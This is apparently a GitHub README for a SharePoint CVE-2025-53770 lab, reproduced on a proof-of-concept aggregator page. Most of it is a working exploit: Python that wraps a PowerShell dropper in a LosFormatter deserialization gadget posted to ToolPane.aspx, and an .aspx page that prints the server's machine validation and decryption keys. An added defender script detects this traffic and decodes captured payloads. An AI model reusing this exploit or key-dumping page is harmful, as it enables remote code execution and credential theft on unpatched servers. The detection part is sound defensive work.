Associated Vulnerability
Title: Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2025-53770)
Description: Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network. Microsoft is aware that an exploit for CVE-2025-53770 exists in the wild. Microsoft is preparing and fully testing a comprehensive update to address this vulnerability. In the meantime, please make sure that the mitigation provided in this CVE documentation is in place so that you are protected from exploitation.
Description
CVE-2025-53770 lab environment
Readme
# sharepoint-CVE-2025-53770
CVE-2025-53770 lab environment
Installation tutorials:
https://www.cnblogs.com/jianyus/p/9874010.html
https://www.cnblogs.com/life512/p/13713483.html
https://www.cnblogs.com/cqpanda/p/16148822.html
https://vladilen.com/content/sharepoint-keys
https://blog.csdn.net/liuzhenhe1988/article/details/112938419
Testing:
https://github.com/projectdiscovery/nuclei/releases/tag/v3.4.10
```
└─$ ./nuclei -t http/cves/2025/CVE-2025-53770.yaml -u http://192.168.139.143

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[CVE-2025-53770] [http] [critical] http://192.168.139.143/_layouts/15/ToolPane.aspx/?DisplayMode=Edit&a=/ToolPane.aspx
[INF] Scan completed in 3.408841065s. 1 matches found.
```
Upload:
```
import base64
import gzip
import urllib.parse
import requests


def BuildPayload(APSXPayloadFile: str):
    def Step1(APSXPayloadFile):
        with open(APSXPayloadFile, 'rb') as apsxp:
            Payload = apsxp.read()
        PayloadEncoded = base64.b64encode(Payload)
        return PayloadEncoded

    def Step2(PayloadEncoded):
        PowerShellPayload = f"""
$base64String = {PayloadEncoded}
$destinationFile = "C:\\PROGRA~1\\COMMON~1\\MICROS~1\\WEBSER~1\\16\\TEMPLATE\\LAYOUTS\\spinstall0.aspx"
$decodedBytes = [System.Convert]::FromBase64String($base64String)
$decodedContent = [System.Text.Encoding]::UTF8.GetString($decodedBytes)
$decodedContent | Set-Content -Path $destinationFile -ErrorAction Stop
"""
        PowerShellPayloadBase64Encoded = base64.b64encode(bytes(PowerShellPayload, 'utf-8')).decode('utf-8')
        PowerShellPayloadExecuterCommand = f"powershell -EncodedCommand {PowerShellPayloadBase64Encoded}"
        return PowerShellPayloadExecuterCommand

    def Step3(PowerShellPayloadExecuterCommand):
        PowerShellPayloadExecuterCommandBase64Encoded = base64.b64encode(bytes(PowerShellPayloadExecuterCommand, 'utf-8')).decode('utf-8')
        Payload = f'<pwn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><ExpandedWrapperOfLosFormatterObjectDataProvider xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" ><ExpandedElement/><ProjectedProperty0><MethodName>Deserialize</MethodName><MethodParameters><anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string"> {PowerShellPayloadExecuterCommandBase64Encoded}</anyType></MethodParameters><ObjectInstance xsi:type="LosFormatter"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfLosFormatterObjectDataProvider></pwn>'
        PayloadBase64Encoded = base64.b64encode(bytes(Payload, 'utf-8')).decode('utf-8')
        PayloadGunziped = gzip.compress(bytes(PayloadBase64Encoded, 'utf-8'))
        return PayloadGunziped

    def Step4(PayloadGunziped):
        PayloadGunzipedBase64Encoded = base64.b64encode(PayloadGunziped).decode('utf-8')
        FinalPayload = f'<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %><%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %><asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest"><ProgressTemplate><div class="divWaiting"><Scorecard:ExcelDataSet CompressedDataTable="{PayloadGunzipedBase64Encoded}" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet></div</ProgressTemplate></asp:UpdateProgress>'
        FinalPayloadURLEncoded = urllib.parse.quote(FinalPayload)
        return FinalPayloadURLEncoded

    PayloadFileEncoded = Step1(APSXPayloadFile)
    #print(f"\nPayload File Base64 Encoded: {bytes(PayloadFileEncoded).decode('utf-8')}")
    PowerShellPayloadEncoded = Step2(bytes(PayloadFileEncoded).decode('utf-8'))
    #print(f"\nPowerShell Payload Base64 Encoded: {PowerShellPayloadEncoded}")
    PayloadGzipped = Step3(PowerShellPayloadEncoded)
    #print(f"\nPayload GZipped: {PayloadGzipped}")
    #PayloadUnGzipped = gzip.decompress(PayloadGzipped)
    #print(f"\nPayload Un Gzipped: {PayloadUnGzipped.decode('utf-8')}")
    FinalPayloadURLEncoded = Step4(PayloadGzipped)
    #print(f"\nFinal Payload URL Encoded: {FinalPayloadURLEncoded}")
    return FinalPayloadURLEncoded


def BuildHTTPRawRequest(TargetSite, TargetSiteSchema, UserAgent, Payload):
    RawRequest = f"""
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: {TargetSite}
User-Agent: {UserAgent}
Accept: */*
Referer: /_layouts/SignOut.aspx
Content-Type: application/x-www-form-urlencoded
Content-Length: {len(Payload)}

MSOTlPn_Uri={urllib.parse.quote(f"{TargetSiteSchema}{TargetSite}")}&MSOTlPn_DWP={urllib.parse.quote(Payload)}
"""
    return RawRequest


def RunAttack(TargetSite, TargetSiteSchemaPrefix, UserAgent, Payload):
    headers = {
        'User-Agent': UserAgent,
        'Referer': '/_layouts/SignOut.aspx',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    data = {
        'MSOTlPn_Uri': f'{TargetSiteSchemaPrefix}{TargetSite}',
        'MSOTlPn_DWP': Payload,
    }
    response = requests.post(
        f'{TargetSiteSchemaPrefix}{TargetSite}/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx',
        headers=headers,
        data=data,
        verify=False,
    )
    return response.text


def Start(TargetSite, TargetSiteSchemaPrefix, UserAgent, PayloadFilePath):
    Payload = BuildPayload(PayloadFilePath)
    RawHTTPRequest = BuildHTTPRawRequest(TargetSite, TargetSiteSchemaPrefix, UserAgent, Payload)
    print(f"\n {'-'*10} PoC Request {'-'*10}\n {RawHTTPRequest}")


if __name__ == "__main__":
    TargetSite = 'example.com'
    PayloadFilePath = 'pwn.aspx'
    TargetSiteSchemaPrefix = "http://"
    UserAgent = "example/0.0.0"
    Start(TargetSite, TargetSiteSchemaPrefix, UserAgent, PayloadFilePath)
```
Exploitation:
```
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server" language="c#" CODEPAGE="65001">
public void Page_load()
{
    var sy = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
    var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
    var gac = mkt.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
    var cg = (System.Web.Configuration.MachineKeySection)gac.Invoke(null, new object[0]);
    Response.Write(cg.ValidationKey+"|"+cg.Validation+"|"+cg.DecryptionKey+"|"+cg.Decryption+"|"+cg.CompatibilityMode);
}
</script>
```
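Added example for the lab (this is not code from the repository or from any of the linked PoCs): a defender-side triage script for the two sections above. It scans IIS W3C log lines for the request shape the PoC sends (an edit-mode POST to ToolPane.aspx with the `a=/ToolPane.aspx` query and a `/_layouts/SignOut.aspx` Referer) and for any request to the `spinstall0.aspx` page the PowerShell stage writes into LAYOUTS, and it unwraps the `CompressedDataTable` attribute of a captured `MSOTlPn_DWP` form field (base64, then gzip, then base64) so an analyst can confirm which deserialization gadget a blocked or captured request carried. The IIS field order, the log lines, the client addresses and the placeholder inner XML are all assumptions or constructed test data; only the lab host 192.168.139.143 comes from the nuclei run above.

```python
# Added example (not part of this repository or the linked PoCs): defender-side
# triage for the request pattern and dropped file shown in the sections above.
import base64
import gzip
import re
import urllib.parse

# Indicators taken from the PoC above: the ToolPane.aspx edit-mode endpoint,
# the SignOut.aspx Referer, the spinstall0.aspx page written into LAYOUTS, and
# the gadget names inside the CompressedDataTable XML.
TOOLPANE_RE = re.compile(r"/_layouts/(?:15/)?ToolPane\.aspx", re.IGNORECASE)
DROPPED_FILE = "spinstall0.aspx"
GADGET_MARKERS = ("LosFormatter", "ObjectDataProvider", "Deserialize")

# Assumed W3C field order for the IIS log (matches the #Fields header in the
# constructed sample below; adjust it to your site's logging configuration).
IIS_FIELDS = ["date", "time", "s_ip", "method", "uri_stem", "uri_query",
              "port", "user", "c_ip", "ua", "referer", "status"]


def parse_iis_line(line):
    """Split one W3C IIS log line into a dict; directive lines (#...) give None."""
    if line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) < len(IIS_FIELDS):
        return None
    return dict(zip(IIS_FIELDS, parts))


def classify(entry):
    """Return the reasons a parsed entry matches the PoC traffic (empty if none)."""
    reasons = []
    stem = entry["uri_stem"]
    query = urllib.parse.unquote(entry["uri_query"])
    referer = urllib.parse.unquote(entry["referer"])
    if entry["method"].upper() == "POST" and TOOLPANE_RE.search(stem):
        if "DisplayMode=Edit" in query and "a=/ToolPane.aspx" in query:
            reasons.append("edit-mode POST to ToolPane.aspx with a=/ToolPane.aspx")
        if referer.lower().endswith("/_layouts/signout.aspx"):
            reasons.append("Referer is /_layouts/SignOut.aspx")
    if DROPPED_FILE in stem.lower():
        reasons.append(f"request for dropped page {DROPPED_FILE}")
    return reasons


def scan_log(lines):
    """Return [(client_ip, uri_stem, reasons)] for every suspicious entry."""
    hits = []
    for line in lines:
        entry = parse_iis_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            hits.append((entry["c_ip"], entry["uri_stem"], reasons))
    return hits


def unwrap_compressed_datatable(form_body):
    """Pull CompressedDataTable out of a captured MSOTlPn_DWP form field and
    reverse the three layers the PoC applies (base64 -> gzip -> base64).
    Returns (inner_xml, gadget markers found), or (None, []) if absent."""
    fields = urllib.parse.parse_qs(form_body)
    dwp = fields.get("MSOTlPn_DWP", [""])[0]
    match = re.search(r'CompressedDataTable="([^"]+)"', dwp)
    if not match:
        return None, []
    gz_bytes = base64.b64decode(match.group(1))      # outer base64 layer
    inner_b64 = gzip.decompress(gz_bytes)            # gzip layer
    inner_xml = base64.b64decode(inner_b64).decode("utf-8", "replace")
    return inner_xml, [m for m in GADGET_MARKERS if m in inner_xml]


# ---- constructed sample data (not real traffic) ----
# 192.168.139.143 is the lab host from the nuclei run above; client addresses,
# timestamps and the inner XML are made up for this example.
SAMPLE_LOG = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status",
    "2025-07-19 10:01:02 192.168.139.143 GET /_layouts/15/start.aspx - 80 - 192.168.139.10 Mozilla/5.0 - 200",
    "2025-07-19 10:02:15 192.168.139.143 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx 80 - 192.168.139.77 example/0.0.0 /_layouts/SignOut.aspx 200",
    "2025-07-19 10:02:20 192.168.139.143 GET /_layouts/15/spinstall0.aspx - 80 - 192.168.139.77 example/0.0.0 - 200",
]


def constructed_sample_body():
    """Build a form body with the same encoding layers as the PoC around a
    harmless placeholder XML that carries one gadget name as a marker."""
    inner_xml = '<triage-sample><ObjectInstance xsi:type="LosFormatter"/></triage-sample>'
    wrapped = base64.b64encode(gzip.compress(base64.b64encode(inner_xml.encode()))).decode()
    dwp = f'<Scorecard:ExcelDataSet CompressedDataTable="{wrapped}" runat="server"></Scorecard:ExcelDataSet>'
    return urllib.parse.urlencode({"MSOTlPn_Uri": "http://192.168.139.143", "MSOTlPn_DWP": dwp})


if __name__ == "__main__":
    for ip, stem, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} {stem}: {'; '.join(reasons)}")
    xml_text, markers = unwrap_compressed_datatable(constructed_sample_body())
    print("gadget markers in captured body:", markers)
```

Run against a real log export, the script flags the POST itself and any follow-up fetch of the dropped page from the same client, which is the point at which the machine keys read by the exploitation `.aspx` above should be treated as exposed.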
Links:
https://hawktrace.com/blog/cve-2025-53772
https://github.com/BirdsAreFlyingCameras/CVE-2025-53770_Raw-HTTP-Request-Generator
https://github.com/hazcod/CVE-2025-53770
https://github.com/exfil0/CVE-2025-53770/tree/main
https://github.com/soltanali0/CVE-2025-53770-Exploit/tree/main
https://github.com/unk9vvn/sharepoint-toolpane
https://github.com/3a7/CVE-2025-53770/tree/main
https://github.com/saladin0x1/CVE-2025-53770
File Snapshot
[4.0K] /data/pocs/533e929966f6942861233eb09c2019e3b1c29371
└── [7.6K] README.md
0 directories, 1 file